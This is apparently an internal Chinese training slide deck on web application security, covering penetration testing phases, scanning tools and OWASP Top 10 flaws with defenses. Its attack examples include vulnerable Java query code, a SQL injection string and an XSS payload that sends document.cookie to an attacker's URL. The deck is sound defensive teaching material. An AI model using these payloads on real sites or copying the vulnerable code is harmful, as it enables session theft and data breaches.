Web 應(yīng)用安全概覽v1.1

Web應(yīng)用安全概覽MX團(tuán)隊(duì)內(nèi)部公開(kāi)武漢安碩織信網(wǎng)絡(luò)科技有限公司目錄背景滲透測(cè)試Web應(yīng)用安全Nessus漏洞掃描功能安全性測(cè)試實(shí)戰(zhàn)演示背景根據(jù)中國(guó)互聯(lián)網(wǎng)絡(luò)信息中心2016年發(fā)布的“第37次中國(guó)互聯(lián)網(wǎng)絡(luò)發(fā)展?fàn)顩r統(tǒng)計(jì)報(bào)告

”，

2015年，42.7%的網(wǎng)民遭遇過(guò)網(wǎng)絡(luò)安全問(wèn)題。背景那企業(yè)呢？5月：俄國(guó)黑客盜取2.73億郵箱信息以1美元價(jià)錢(qián)販賣(mài)，其中包括

4000

萬(wàn)個(gè)雅虎郵箱、3300

萬(wàn)微軟郵箱以及

2400

萬(wàn)個(gè)谷歌郵箱。6月：MySpace4.27

億數(shù)據(jù)泄漏，或成互聯(lián)網(wǎng)史上最大規(guī)模的密碼泄露事件。應(yīng)用程序安全風(fēng)險(xiǎn)

攻擊者可以通過(guò)應(yīng)用程序中許多不同的路徑方法去危害您的業(yè)務(wù)或者企業(yè)組織。每種路徑方法都代表了一種風(fēng)險(xiǎn),這些風(fēng)險(xiǎn)可能會(huì),也有可能不會(huì)嚴(yán)重到值得您去關(guān)注。這樣的攻擊每時(shí)每刻都在重演，如何規(guī)避？將鏈路核心漏洞堵死對(duì)系統(tǒng)的任何弱點(diǎn)、技術(shù)缺陷或漏洞進(jìn)行主動(dòng)分析，滲透測(cè)試當(dāng)仁不讓滲透測(cè)試定義滲透測(cè)試(PenetrationTesting

或者

PenTesting，

PT)沒(méi)有一個(gè)標(biāo)準(zhǔn)的定義。國(guó)外一些安全組織達(dá)成共識(shí)的通用說(shuō)法是，滲透測(cè)試是通過(guò)模擬惡意黑客的攻擊方法，來(lái)評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全的一種評(píng)估方法。這個(gè)過(guò)程包括對(duì)系統(tǒng)的任何弱點(diǎn)、技術(shù)缺陷或洞的主動(dòng)分析，這個(gè)分析是從一個(gè)攻擊者可能存在的位置來(lái)進(jìn)行的，并且從這個(gè)位置有條件主動(dòng)利用安全漏洞，達(dá)到一定的控制權(quán)限。滲透測(cè)試是對(duì)用戶(hù)信息安全措施積極評(píng)估的過(guò)程。通過(guò)系統(tǒng)化的操作和分析，積極發(fā)現(xiàn)系統(tǒng)和網(wǎng)絡(luò)中存在的各種缺陷和弱點(diǎn)，如設(shè)計(jì)缺陷和技術(shù)缺陷。滲透測(cè)試方法滲透測(cè)試與其他評(píng)估方法不同。通常的評(píng)估方法是根據(jù)已知信息資源或其他被評(píng)估對(duì)象，去發(fā)現(xiàn)所有相關(guān)的安全問(wèn)題。滲透測(cè)試是根據(jù)已知可利用的安全漏洞，去發(fā)現(xiàn)是否存在相應(yīng)的信息資源。相比較而言，通常評(píng)估方法對(duì)評(píng)估結(jié)果更具有全面性，而滲透測(cè)試更注重安全漏洞的嚴(yán)重性。滲透測(cè)試階段信息收集——兵馬未動(dòng)，糧草先行漏洞掃描——知己知彼，百戰(zhàn)不殆漏洞利用——攻其不備，出其不意滲透測(cè)試——信息收集收集滲透目標(biāo)的情報(bào)是最重要的階段。如果收集到有用的情報(bào)資料的話(huà)，可以大大提高對(duì)滲透測(cè)試的成功性。收集滲透目標(biāo)的情報(bào)一般是對(duì)目標(biāo)系統(tǒng)的分析，掃描探測(cè)，服務(wù)查點(diǎn)，掃描對(duì)方漏洞，查找對(duì)方系統(tǒng)IP等，有時(shí)候滲透測(cè)試者也會(huì)用上“社會(huì)工程學(xué)”。滲透測(cè)試者會(huì)盡力搜集目標(biāo)系統(tǒng)的配置與安全防御以及防火墻等等。其主要知識(shí)點(diǎn)如下：枚舉服務(wù)；測(cè)試網(wǎng)絡(luò)范圍；識(shí)別活躍的主機(jī)和查看打開(kāi)的端口；系統(tǒng)指紋識(shí)別；服務(wù)指紋識(shí)別；其他信息收集手段；使用Maltego收集信息；繪制網(wǎng)絡(luò)圖。滲透測(cè)試——信息收集枚舉服務(wù)枚舉是一類(lèi)程序，它允許用戶(hù)從一個(gè)網(wǎng)絡(luò)中收集某一類(lèi)的所有相關(guān)信息。DNS枚舉可以收集本地所有DNS服務(wù)和相關(guān)條目。DNS枚舉可以幫助用戶(hù)收集目標(biāo)組織的關(guān)鍵信息，如用戶(hù)名、計(jì)算機(jī)名和IP地址等。常用工具主要有：DNS枚舉工具DNSenum；DNS枚舉工具fierce。滲透測(cè)試——信息收集測(cè)試網(wǎng)絡(luò)范圍測(cè)試網(wǎng)絡(luò)范圍內(nèi)的IP地址或域名也是滲透測(cè)試的一個(gè)重要部分。通過(guò)測(cè)試網(wǎng)絡(luò)范圍內(nèi)的IP地址或域名，確定是否有人入侵自己的網(wǎng)絡(luò)中并損害系統(tǒng)。常用工具主要有：域名查詢(xún)工具Dmitry：查詢(xún)IP或域名WHOIS信息；跟蹤路由工具Scapy。滲透測(cè)試——信息收集識(shí)別活躍的主機(jī)嘗試滲透測(cè)試之前，必須先識(shí)別在這個(gè)目標(biāo)網(wǎng)絡(luò)內(nèi)活躍的主機(jī)。常用工具主要有：網(wǎng)絡(luò)映射器工具Nmap：

免費(fèi)開(kāi)放的網(wǎng)絡(luò)掃描和嗅探工具包

。滲透測(cè)試——信息收集查看打開(kāi)的端口對(duì)一個(gè)大范圍的網(wǎng)絡(luò)或活躍的主機(jī)進(jìn)行滲透測(cè)試，必須要了解這些主機(jī)上所打開(kāi)的端口號(hào)。常用工具主要有：TCP端口掃描工具Nmap；圖形化TCP端口掃描工具Zenmap。滲透測(cè)試——信息收集系統(tǒng)指紋識(shí)別系統(tǒng)指紋信息包括目標(biāo)主機(jī)打開(kāi)的端口、MAC地址、操作系統(tǒng)類(lèi)型和內(nèi)核版本等。常用工具主要有：使用Nmap工具識(shí)別系統(tǒng)指紋信息；指紋識(shí)別工具p0f。滲透測(cè)試——信息收集服務(wù)指紋識(shí)別服務(wù)指紋信息包括服務(wù)端口、服務(wù)名和版本等。常用工具主要有：使用Nmap工具識(shí)別服務(wù)指紋信息；服務(wù)枚舉工具Amap。滲透測(cè)試——信息收集其他信息收集手段Recon-NG框架：由Python編寫(xiě)的一個(gè)開(kāi)源的Web偵查（信息收集）框架；搜索引擎工具Shodan：Shodan可以說(shuō)是一款"黑暗"谷歌，一直不停的在尋找著所有和互聯(lián)網(wǎng)連接的服務(wù)器、攝像頭、打印機(jī)和路由器等。滲透測(cè)試——信息收集使用Maltego收集信息Maltego是一個(gè)開(kāi)源的漏洞評(píng)估工具，它主要用于論證一個(gè)網(wǎng)絡(luò)內(nèi)單點(diǎn)故障的復(fù)雜性和嚴(yán)重性。該工具能夠聚集來(lái)自?xún)?nèi)部和外部資源的信息，并且提供一個(gè)清晰的漏洞分析界面。滲透測(cè)試——信息收集繪制網(wǎng)絡(luò)結(jié)構(gòu)圖CaseFile工具用來(lái)繪制網(wǎng)絡(luò)結(jié)構(gòu)圖。使用該工具能快速添加和連接，并能以圖形界面形式靈活的構(gòu)建網(wǎng)絡(luò)結(jié)構(gòu)圖。滲透測(cè)試——漏洞掃描漏洞掃描器是一種能夠自動(dòng)在計(jì)算機(jī)、信息系統(tǒng)、網(wǎng)絡(luò)及應(yīng)用軟件中尋找和發(fā)現(xiàn)安全弱點(diǎn)的程序。它通過(guò)網(wǎng)絡(luò)對(duì)目標(biāo)系統(tǒng)進(jìn)行探測(cè)，向目標(biāo)系統(tǒng)發(fā)生數(shù)據(jù)，并將反饋數(shù)據(jù)與自帶的漏洞特征庫(kù)進(jìn)行匹配，進(jìn)而列舉目標(biāo)系統(tǒng)上存在的安全漏洞。漏洞掃描是保證系統(tǒng)和網(wǎng)絡(luò)安全必不可少的手段，面對(duì)互聯(lián)網(wǎng)入侵，如果用戶(hù)能夠根據(jù)具體的應(yīng)用環(huán)境，盡可能早的通過(guò)網(wǎng)絡(luò)掃描來(lái)發(fā)現(xiàn)安全漏洞，并及時(shí)采取適當(dāng)?shù)奶幚泶胧┻M(jìn)行修補(bǔ)，就可以有效地阻止入侵事件的發(fā)生。漏洞掃描工作相對(duì)枯燥，所以我們可以借助一些便捷的工具來(lái)實(shí)施，如Nessus和OpenVAS。滲透測(cè)試——漏洞掃描NessusNessus號(hào)稱(chēng)是世界上最流行的漏洞掃描程序，全世界有超過(guò)75000個(gè)組織在使用它。該工具提供完整的電腦漏洞掃描服務(wù)，并隨時(shí)更新其漏洞數(shù)據(jù)庫(kù)。Nessus不同于傳統(tǒng)的漏洞掃描軟件，Nessus可同時(shí)在本機(jī)或遠(yuǎn)端上遙控，進(jìn)行系統(tǒng)的漏洞分析掃描。OpenVASOpenVAS（開(kāi)放式漏洞評(píng)估系統(tǒng)）是一個(gè)客戶(hù)端/服務(wù)器架構(gòu)，它常用來(lái)評(píng)估目標(biāo)主機(jī)上的漏洞。OpenVAS是Nessus項(xiàng)目的一個(gè)分支，它提供的產(chǎn)品是完全地免費(fèi)。滲透測(cè)試——漏洞利用漏洞利用階段利用已獲得的信息和各種攻擊手段實(shí)施滲透。網(wǎng)絡(luò)應(yīng)用程序漏洞診斷項(xiàng)目的加密通信漏洞診斷是必須執(zhí)行的。顧名思義，利用漏洞，達(dá)到攻擊的目的。漏洞利用是獲得系統(tǒng)控制權(quán)限的重要途徑。用戶(hù)從目標(biāo)系統(tǒng)中找到容易攻擊的漏洞，然后利用該漏洞獲取權(quán)限，從而實(shí)現(xiàn)對(duì)目標(biāo)系統(tǒng)的控制。Metasploit是一款開(kāi)源的安全漏洞檢測(cè)工具框架。它可以幫助用戶(hù)識(shí)別安全問(wèn)題，驗(yàn)證漏洞的緩解措施，并對(duì)某些軟件進(jìn)行安全性評(píng)估，提供真正的安全風(fēng)險(xiǎn)情報(bào)。滲透測(cè)試——

Kali

LinuxKaliLinux是基于Debian的Linux發(fā)行版，設(shè)計(jì)用于數(shù)字取證和滲透測(cè)試。KaliLinux預(yù)裝了許多滲透測(cè)試軟件，包括nmap（端口掃描器）、Wireshark（數(shù)據(jù)包分析器）、JohntheRipper（密碼破解器），以及Aircrack-ng（一應(yīng)用于對(duì)無(wú)線(xiàn)局域網(wǎng)進(jìn)行滲透測(cè)試的軟件）等。Web

應(yīng)用安全OWASP（OpenWebApplicationSecurityProject，

開(kāi)源web應(yīng)用安全項(xiàng)目）每隔數(shù)年會(huì)更新10個(gè)最關(guān)鍵的Web應(yīng)用安全問(wèn)題清單，即OWASPTop10。Web

應(yīng)用安全——

OWASPTop10Web

應(yīng)用安全——

OWASPTop10Web漏洞——注入攻擊案例：應(yīng)用程序在下面存在漏洞的

SQL

語(yǔ)句的構(gòu)造中使用不可信數(shù)據(jù)：Stringquery="SELECT*FROMaccountsWHEREcustID='"+request.getParameter("id")+"'";攻擊者在瀏覽器中將“id”參數(shù)的值修改成：

'or'1'='1Web漏洞——

注入如何防止？防止注入漏洞需要將不可信數(shù)據(jù)從命令及查詢(xún)中區(qū)分開(kāi)。最佳選擇是使用安全的API，完全避免使用解釋器或供參數(shù)化界面的API。但要注意有些參數(shù)化的API，比如存儲(chǔ)過(guò)程（storedprocedures），如果使用不當(dāng)，仍然可以引入注入漏洞。如果沒(méi)法使用一個(gè)參數(shù)化的API，那么你應(yīng)該使用解釋器具體的escape語(yǔ)法來(lái)避免特殊字符。OWASP的ESAPI就有一些escape例程。使用正面的或“白名單”的具有恰當(dāng)?shù)囊?guī)范化的輸入驗(yàn)證方法同樣會(huì)有助于防止注入攻擊。但由于很多應(yīng)用在輸入中需要特殊字符，這一方法不是完整的防護(hù)方法。OWASP的ESAPI中包含一個(gè)白名單輸入驗(yàn)證例程的擴(kuò)展庫(kù)。Web漏洞——

失效的身份認(rèn)證和會(huì)話(huà)管理攻擊案例：案例1：應(yīng)用程序超時(shí)設(shè)置不當(dāng)。用戶(hù)使用公共計(jì)算機(jī)訪(fǎng)問(wèn)網(wǎng)站。離開(kāi)時(shí),該用戶(hù)沒(méi)有點(diǎn)擊退出,而是直接關(guān)閉瀏覽器。攻擊者在一個(gè)小時(shí)后能使用相同瀏覽器通過(guò)身份認(rèn)證。案例2：內(nèi)部或外部攻擊者進(jìn)入系統(tǒng)的密碼數(shù)據(jù)庫(kù).存儲(chǔ)在數(shù)據(jù)庫(kù)中的用戶(hù)密碼沒(méi)有被加密,所有用戶(hù)的密碼都被攻擊者獲得。如何防止？對(duì)企業(yè)最主要的建議是讓開(kāi)發(fā)人員使用如下資源。一套單一的強(qiáng)大的認(rèn)證和會(huì)話(huà)管理控制系統(tǒng)。企業(yè)同樣也要做出巨大努力來(lái)避免跨站漏洞，因?yàn)檫@一漏洞可以用來(lái)盜竊用戶(hù)會(huì)話(huà)ID。Web漏洞——

失效的身份認(rèn)證和會(huì)話(huà)管理Web漏洞——跨站腳本（XSS）攻擊案例：應(yīng)用程序在下面HTML代碼段的構(gòu)造中使用未經(jīng)驗(yàn)證或轉(zhuǎn)義的不可信的數(shù)據(jù)：(String)page+="<inputname='creditcard'type='TEXT‘value='"+request.getParameter("CC")+"'>";攻擊者在瀏覽器中修改“CC”參數(shù)為如下值:'><script>document.locakon='h\p://www.a\/cgi-bin/cookie.cgi?foo='+document.cookie</script>'這導(dǎo)致受害者的會(huì)話(huà)ID被發(fā)送到攻擊者的網(wǎng)站,使得攻擊者能夠劫持用戶(hù)當(dāng)前會(huì)話(huà)。請(qǐng)注意攻擊者同樣能使用跨站腳本攻破應(yīng)用程序可能使用的任何跨站請(qǐng)求偽造(CSRF)防御機(jī)制。Web漏洞——跨站腳本（XSS）如何防止？防止XSS需要將不可信數(shù)據(jù)與動(dòng)態(tài)的瀏覽器內(nèi)容區(qū)分開(kāi)。最好的辦法是根據(jù)數(shù)據(jù)將要置于的HTML上下文(包括主體、屬性、JavaScript、CSS或URL)對(duì)所有的不可信數(shù)據(jù)進(jìn)行恰當(dāng)?shù)霓D(zhuǎn)義(escape)。使用正面的或“白名單”的，具有恰當(dāng)?shù)囊?guī)范化和解碼功能的輸入驗(yàn)證方法同樣會(huì)有助于防止跨站腳本但由于很多應(yīng)用程序在輸入中需要特殊字符,這一方法不是完整的防護(hù)方法。這種驗(yàn)證方法需要盡可能地解碼任何編碼輸入,同時(shí)在接受輸入之前需要充分驗(yàn)證數(shù)據(jù)的長(zhǎng)度、字符、格式、和任何商務(wù)規(guī)則?？紤]使用內(nèi)容安全策略（CSP）來(lái)抵御整個(gè)網(wǎng)站的跨站腳本攻擊。Web漏洞——不安全的直接對(duì)象引用攻擊案例：

應(yīng)用程序在訪(fǎng)問(wèn)帳戶(hù)信息的SQL調(diào)用中使用未驗(yàn)證數(shù)據(jù)：Stringquery="SELECT*FROMacctsWHEREaccount=?";PreparedStatementpstmt=conneckon.prepareStatement(query,...);pstmt.setString(1,request.getparameter("acct"));ResultSetresults=pstmt.executeQuery();攻擊者能輕易在瀏覽器將“acct”參數(shù)修改成他所想要的任何賬戶(hù)號(hào)碼。如果應(yīng)用程序沒(méi)有進(jìn)行恰當(dāng)?shù)尿?yàn)證，攻擊者就能訪(fǎng)問(wèn)任何用戶(hù)的賬戶(hù)，而不僅僅是該目標(biāo)用戶(hù)的賬戶(hù)。Web漏洞——不安全的直接對(duì)象引用如何防止？要防止不安全的直接對(duì)象引用,需要選擇一個(gè)適當(dāng)?shù)姆椒▉?lái)保護(hù)每一個(gè)用戶(hù)可訪(fǎng)問(wèn)的對(duì)象(如對(duì)象號(hào)碼、文件名)。使用基于用戶(hù)或者會(huì)話(huà)的間接對(duì)象引用。這樣能防止攻擊者直接攻擊未授權(quán)資源。例如，一個(gè)下拉列表包含6個(gè)授權(quán)給當(dāng)前用戶(hù)的資源，它可以使用數(shù)字1-6來(lái)指示哪個(gè)是用戶(hù)選擇的值，而不是使用資源的數(shù)據(jù)庫(kù)關(guān)鍵字來(lái)表示。在服務(wù)器端，應(yīng)用程序需要將每個(gè)用戶(hù)的間接引用映射到實(shí)際的數(shù)據(jù)庫(kù)關(guān)鍵字。檢查訪(fǎng)問(wèn)。任何來(lái)自不可信源的直接對(duì)象引用都必須通過(guò)訪(fǎng)問(wèn)控制檢測(cè),確保該用戶(hù)對(duì)請(qǐng)求的對(duì)象有訪(fǎng)問(wèn)權(quán)限。Web漏洞——

安全配置錯(cuò)誤攻擊案例：案例1：應(yīng)用程序服務(wù)器管理員控制臺(tái)自動(dòng)安裝后沒(méi)有被刪除。而默認(rèn)帳戶(hù)也沒(méi)有被改變。攻擊者在你的服務(wù)器上發(fā)現(xiàn)了標(biāo)準(zhǔn)的管理員頁(yè)面，通過(guò)默認(rèn)密碼登錄，從而接管了你的服務(wù)器。案例2：目錄列表在你的服務(wù)器上未被禁用。攻擊者發(fā)現(xiàn)只需列出目錄,她就可以找到你服務(wù)器上的任意文件。攻擊者找到并下載所有已編譯的Java類(lèi)，她通過(guò)反編譯獲得了所有你的自定義代碼。然后，她在你的應(yīng)用程序中找到一個(gè)訪(fǎng)問(wèn)控制的嚴(yán)重漏洞。如何防止？主要的建議建立在以下幾個(gè)方面：一個(gè)可以快速且易于部署在另一個(gè)鎖定環(huán)境的可重復(fù)的加固過(guò)程。開(kāi)發(fā)、質(zhì)量保證和生產(chǎn)環(huán)境都應(yīng)該配置相同(每個(gè)環(huán)境中使用不同的密碼)。這個(gè)過(guò)程應(yīng)該是自動(dòng)化的，以盡量減少安裝一個(gè)新安全環(huán)境的耗費(fèi)。一個(gè)能及時(shí)了解并部署每個(gè)已部署環(huán)境的所有最新軟件更新和補(bǔ)丁的過(guò)程。這需要包括通常被忽略的所有代碼的庫(kù)文件。一個(gè)能在組件之間供有效的分離和安全性的強(qiáng)大應(yīng)用程序架構(gòu)。實(shí)施漏洞掃和經(jīng)常進(jìn)行審計(jì)以幫助檢測(cè)將來(lái)可能的錯(cuò)誤配置或沒(méi)有安裝的補(bǔ)丁。Web漏洞——安全配置錯(cuò)誤Web漏洞——

敏感信息泄露攻擊案例：案例1：一個(gè)應(yīng)用程序加密存儲(chǔ)在數(shù)據(jù)庫(kù)的信用卡信息,以防止信用卡信息暴露給最終用戶(hù)。但是，數(shù)據(jù)庫(kù)設(shè)置為對(duì)信用卡表列的查詢(xún)進(jìn)行自動(dòng)解密,這就使得SQL注入漏洞能夠獲得所有信用卡信息的明文。該系統(tǒng)應(yīng)該被設(shè)置為前端應(yīng)用程序使用公鑰對(duì)信用卡信息加密,后端應(yīng)用程序只能使用私鑰解密。案例2：一個(gè)網(wǎng)站上所有需要身份驗(yàn)證的網(wǎng)頁(yè)都沒(méi)有使用SSL。攻擊者只需監(jiān)控網(wǎng)絡(luò)數(shù)據(jù)流(比如一個(gè)開(kāi)放的無(wú)線(xiàn)網(wǎng)絡(luò)或其社區(qū)的有線(xiàn)網(wǎng)絡(luò))，并竊取一個(gè)已驗(yàn)證的受害者的會(huì)話(huà)cookie。然后，攻擊者利用這個(gè)cookie執(zhí)行重放攻擊并接管用戶(hù)的會(huì)話(huà)從而訪(fǎng)問(wèn)用戶(hù)的隱私數(shù)據(jù)。如何防止？有關(guān)使用不安全的加密算法、SSL使用和數(shù)據(jù)保護(hù)的風(fēng)險(xiǎn)超出了Top10的范圍。盡管如此，對(duì)一些需要加密的敏感數(shù)據(jù),應(yīng)該起碼做到以下幾點(diǎn)：預(yù)測(cè)一些威脅(比如內(nèi)部攻擊和外部用戶(hù))，加密這些數(shù)據(jù)的存儲(chǔ)以確保免受這些威脅。對(duì)于沒(méi)必要存放的、重要的敏感數(shù)據(jù)，應(yīng)當(dāng)盡快清除。確保使用了合適的強(qiáng)大的標(biāo)準(zhǔn)算法和強(qiáng)大的密匙，并且密匙管理到位。確保使用密碼專(zhuān)用算法存儲(chǔ)密碼，如：bcrypt、PBKDF2或者scrypt。禁用自動(dòng)完成防止敏感數(shù)據(jù)收集,禁用包含敏感數(shù)據(jù)的緩存頁(yè)面。Web漏洞——敏感信息泄露Web漏洞——功能級(jí)訪(fǎng)問(wèn)控制缺失攻擊案例：攻擊者僅僅直接瀏覽目標(biāo)網(wǎng)址。例如下面的兩個(gè)網(wǎng)址都需要身份驗(yàn)證，而且訪(fǎng)問(wèn)“admin_getappInfo”頁(yè)面還需要管理員權(quán)限。http:///app/getappInfohttp:///app/admin_getappInfo如果未認(rèn)證的用戶(hù)可以訪(fǎng)問(wèn)上述任一頁(yè)面，這就是漏洞。如果通過(guò)驗(yàn)證的非管理員用戶(hù)也能允許訪(fǎng)問(wèn)“admin_getappInfo”頁(yè)面，這同樣是個(gè)漏洞。Web漏洞——功能級(jí)訪(fǎng)問(wèn)控制缺失如何防止？您的應(yīng)用程序應(yīng)該使用一致的和易于分析的授權(quán)模塊，并能在所有的業(yè)務(wù)功能中調(diào)用該模塊。通常是，由一個(gè)或多個(gè)外部組件向應(yīng)用代碼內(nèi)部供這種保護(hù)?？紤]一下管理權(quán)利的過(guò)程并確保能夠容易的進(jìn)行升級(jí)和審計(jì)。切忌硬編碼。執(zhí)行機(jī)制在缺省情況下，應(yīng)該拒絕所有訪(fǎng)問(wèn)。對(duì)于每個(gè)功能的訪(fǎng)問(wèn)，需要明確授予特定角色的訪(fǎng)問(wèn)權(quán)限。如果某功能參與了工作流程，檢查并確保當(dāng)前的條件是授權(quán)訪(fǎng)問(wèn)此功能的合適狀態(tài)。Nessus漏洞掃描—檢測(cè)范圍操作系統(tǒng)漏洞檢測(cè)

對(duì)Windows、Solaris、AIX、Linux、SCO、SGI等操作系統(tǒng)本身進(jìn)行漏洞檢測(cè)；數(shù)據(jù)庫(kù)漏洞檢測(cè)

對(duì)MS-SQL、Oracle、MySQL、Informix、Sybase、DB2、Access等數(shù)據(jù)庫(kù)進(jìn)行漏洞檢測(cè)；應(yīng)用系統(tǒng)漏洞檢測(cè)

對(duì)滲透目標(biāo)提供的各種應(yīng)用，如ASP、CG